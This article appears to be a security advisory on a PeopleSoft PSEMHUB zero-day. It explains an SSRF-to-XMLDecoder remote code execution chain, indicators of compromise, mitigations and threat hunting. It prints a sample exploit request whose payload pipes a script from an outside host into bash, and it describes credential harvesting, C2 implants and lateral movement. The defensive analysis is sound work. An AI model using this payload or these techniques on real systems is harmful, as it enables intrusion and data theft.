Introduction
Enterprise Resource Planning (ERP) systems store an organization’s most sensitive financial, operational, and personal data, making them prime targets for sophisticated cyber threat actors looking to maximize their leverage. On June 10, 2026, Oracle released an urgent, out-of-band security alert addressing CVE-2026-35273—a critical remote code execution (RCE) vulnerability actively exploited as a zero-day within the Oracle PeopleSoft PeopleTools component. Attributed to the advanced persistent threat group UNC6240 (which has established ties to the notorious ShinyHunters extortion collective), this critical security flaw was aggressively leveraged to breach perimeter security controls and compromise over 100 global organizations before a vendor fix was finalized. The rapid deployment of this exploit underscores the high valuation of zero-day access on the black market and highlights a growing trend of targeting mission-critical middleware to bypass traditional endpoint defenses.
Learning Objectives
By the end of this article, you will be able to:
- Understand the core architectural flaw behind CVE-2026-35273 in Oracle PeopleSoft.
- Analyze how threat actors bypass access controls using malformed HTTP requests.
- Identify key Indicators of Compromise (IoCs) and post-exploitation patterns left by adversaries.
- Apply immediate defensive workarounds and long-term patching strategies to protect your infrastructure.
What is CVE-2026-35273 – Oracle PeopleSoft Zero-Day Vulnerability
CVE-2026-35273 is a highly critical remote code execution (RCE) vulnerability residing in the Updates Environment Management component of Oracle PeopleSoft Enterprise PeopleTools—specifically affecting the Environment Management Hub (PSEMHUB) application. Assigned a maximum CVSS v3 base score of 9.8 (Critical), this security flaw allows completely unauthenticated, remote attackers to execute arbitrary commands directly on the underlying operating system hosting the application. Because it requires zero user interaction and functions with low attack complexity, it represents the highest tier of threat to enterprise perimeter security. Threat intelligence reports reveal that this vulnerability was aggressively exploited in the wild as a zero-day for roughly a two-week window between May 27 and June 9, 2026, prior to Oracle’s emergency disclosure. The threat actors behind the campaign heavily targeted the higher education sector across the globe, focusing extensively on major universities.
By weaponizing this flaw, adversaries successfully bypassed traditional web application firewalls to gain initial access, ultimately resulting in the systemic exfiltration of massive databases containing student, faculty, and alumni personally identifiable information (PII). This stolen data began surfacing on the ShinyHunters Data Leak Site (DLS) immediately prior to the patch release, turning a standard intrusion into a high-stakes corporate extortion and reputational crisis.
Technical Detail: How the Vulnerability Works
The root cause of CVE-2026-35273 lies in an architectural flaw within how the Environment Management Hub (PSEMHUB) processes untrusted input. This architectural oversight creates a catastrophic exploit chain: an initial Server-Side Request Forgery (SSRF) is weaponized to bypass perimeter authentication, which subsequently feeds a malicious payload into an unsafe Java deserialization routine, ultimately yielding full operating system-level code execution.
The attack methodology follows a distinct, highly orchestrated multi-stage lifecycle:
- Perimeter Target Identification: Adversaries scan internet-facing infrastructure to locate exposed Oracle PeopleSoft web servers. Once a target is mapped, they dispatch specially crafted HTTP POST requests directly to public-facing, yet inherently internal-facing, management endpoints:
/PSEMHUB/hub/PSIGW/HttpListeningConnector
- Access Control Bypass via SSRF: Under normal operations, these endpoints are intended to handle internal node communication within the PeopleSoft cluster. However, due to a severe lack of input sanitization and verification on incoming HTTP request wrappers, the frontend application structural logic accepts the packet. It implicitly trusts the request, proxying the malicious payload directly to backend WebLogic management beans without enforcing any form of administrative authentication or session validation.
- Deserialization & Remote Code Execution (RCE): Once the payload reaches the internal management interface, it relies on the backend application passing the XML data to unsafe, native Java parsers—specifically
java.beans.XMLDecoder. Because the application attempts to reconstruct the serialized object provided by the attacker, it blindly executes the embedded instructions. Attackers meticulously craft this object structure to force the Java Virtual Machine (JVM) to instantiate aProcessBuilderobject, dropping out of the application container to execute arbitrary commands on the underlying host operating system.
POST /PSEMHUB/hub HTTP/1.1
Host: [target-peoplesoft-domain]
User-Agent: Mozilla/5.0
Content-Type: application/xml
Content-Length: [length]
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>curl -s http://azurenetfiles.net/agent.sh | bash</string></void>
</array>
<void method="start"/>
</object>
</java>- Post-Exploitation & Network Discovery: Achieving initial access on the web server is merely the first phase. Once the shell terminates or calls back, threat actors immediately execute an automated post-exploitation playbook designed for long-term persistence and domain-wide compromise:
- Topology Mapping: The attackers parse local environment files, specifically reading the PeopleSoft process scheduler configuration (
psappsrv.cfg) and WebLogic server configurations (config.xml), to quickly harvest hardcoded database credentials and map internal network subnets. - C2 Implantation: To ensure continuous access without raising alarms, they drop custom MeshCentral remote management binaries. These agents are named to mimic native cloud telemetry processes (e.g.,
meshagent64-azure-ops.exe) and communicate outward via HTTPS to lookalike domains likeazurenetfiles.net. - Lateral Movement: Armed with internal credentials and network layouts, adversaries execute custom orchestration shell scripts (such as
[victim]_fanout.sh) utilizing utility packages likesshpass. This allows them to systematically spray stolen credentials across internal systems found in/etc/hostsand move laterally until they reach high-value data repositories.
Remediation & Defensive Actions
Security administrators must take immediate, decisive action to isolate and secure vulnerable instances of Oracle PeopleTools (specifically branches 8.61 and 8.62). Because this campaign involved extensive zero-day activity before vendor disclosure, defense requires a dual-pronged strategy: cutting off the immediate external attack surface and executing a rigorous, retroactive threat hunt to root out potential hidden persistence.
1. Immediate Perimeter Mitigation (Temporary Workarounds) If operational constraints or change-management protocols prevent the immediate application of Oracle’s binary patch, network engineers should immediately deploy perimeter controls. These measures effectively eliminate the external attack surface without disrupting day-to-day business operations:
- Strict Endpoint Access Control Lists (ACLs): Configure edge routing, Web Application Firewalls (WAFs), reverse proxies, or application load balancers to drop all external HTTP/HTTPS traffic directed at the following critical deployment paths:
/PSEMHUB/*/PSIGW/HttpListeningConnector
Operational Note: Incident response data and empirical testing confirm that blocking external access to these specific backend management paths is entirely non-breaking for standard employee, faculty, or student portal sessions. Standard user workflows rely on the primary PeopleSoft Internet Architecture (PIA) browser interface, which operates independently of these hub endpoints.
- Service Deactivation (EMHub): In distributed, multi-server architectures, explicitly stop and disable the Environment Management Hub (EMHub) daemon across all web tier nodes to ensure it cannot be locally or internally coerced. In single-server configurations where the service cannot be gracefully isolated, completely remove or un-deploy the PSEMHUB web application archive from the server root.
2. Permanent Vendor Patching While network mitigations interrupt the exploit chain, they do not resolve the underlying software defect. Comprehensive remediation requires updating the underlying application logic:
- Apply Emergency Out-of-Band Update: Authenticate directly to the My Oracle Support (MOS) portal and pull the technical documentation under Patch Availability Document (ID: CPU187). Download the specific, certified patch binary compiled for your active PeopleTools release branch, test the deployment within a staging environment to ensure no regression of custom modifications, and push the update to production production tiers.
3. Threat Hunting & Post-Exploitation Auditing Because the threat group UNC6240 successfully operated this exploit in the wild prior to patch availability, applying the patch does not guarantee an environment is secure. Defensive teams must assume a assume-breach posture and retroactively audit their local infrastructure for indicators of compromise (IoCs) and active webshells:
- File System Integrity Verification: Conduct a deep forensic sweep of the web server’s document root. Specifically, scrutinize the deployment directories inside the
PSEMHUB.warapplication path for any unauthorized or newly introduced.jspscripts. Additionally, inspect the directory structure for anomalous, hidden, or unexpected folders created within the PSEMHUB paths, paying close attention to directory names designed to blend into standard telemetry, such aslogs,persistantstorage, orscratchpad. - Configuration Drift Auditing: Examine core configuration structures, such as XML metadata trees beneath the web server’s root path (
envmetadata/data/environment). Attackers routinely inject unauthorized serialization blocks directly into these files, forcing the WebLogic application instance to parse and execute malicious commands viaXMLDecoderevery time the service restarts. - Egress Network Traffic Profiling: Analyze network flow logs originating specifically from the PeopleSoft application and web server subnets. Defenders should proactively hunt for two distinct outbound network anomalies:
- Unauthorized Outbound TCP Port 445 (SMB) Connections: Payload variants frequently attempt to force the host system to interact with external, malicious SMB shares. This behavior is designed to intentionally leak and coerce host machine-account NetNTLM authentication hashes into adversary-controlled listening posts.
- Persistent Non-Standard HTTPS Beacons: Audit outbound TLS traffic for continuous, structured beacons traveling toward newly registered or lookalike cloud infrastructure domains (such as
azurenetfiles.net), which indicates the presence of a hidden MeshCentral or similar command-and-control (C2) backdoor.
Conclusion
The exploitation of CVE-2026-35273 underscores the compounding risks associated with leaving complex, administrative endpoints exposed to the public internet. When a zero-day vulnerability emerges in core, mission-critical ERP software, the traditional window for defense effectively collapses—leaving security teams to measure their reaction time in hours rather than weeks. This campaign clearly demonstrates that relying solely on native application authentication is an insufficient defense strategy for high-value targets. Restricting access to internal management tools like PSEMHUB, and enforcing strict network segmentation, remains a fundamental tenet of a modern zero-trust architecture. Ultimately, defeating sophisticated threat groups like UNC6240 requires a continuous, multi-layered approach to defense. By applying immediate network-level workarounds to sever the external attack surface, executing proactive and retroactive threat hunts to eradicate hidden persistence indicators, and rapidly deploying Oracle’s official out-of-band security patches, enterprise organizations can robustly defend their critical environments and protect their most sensitive data stores from systemic compromise.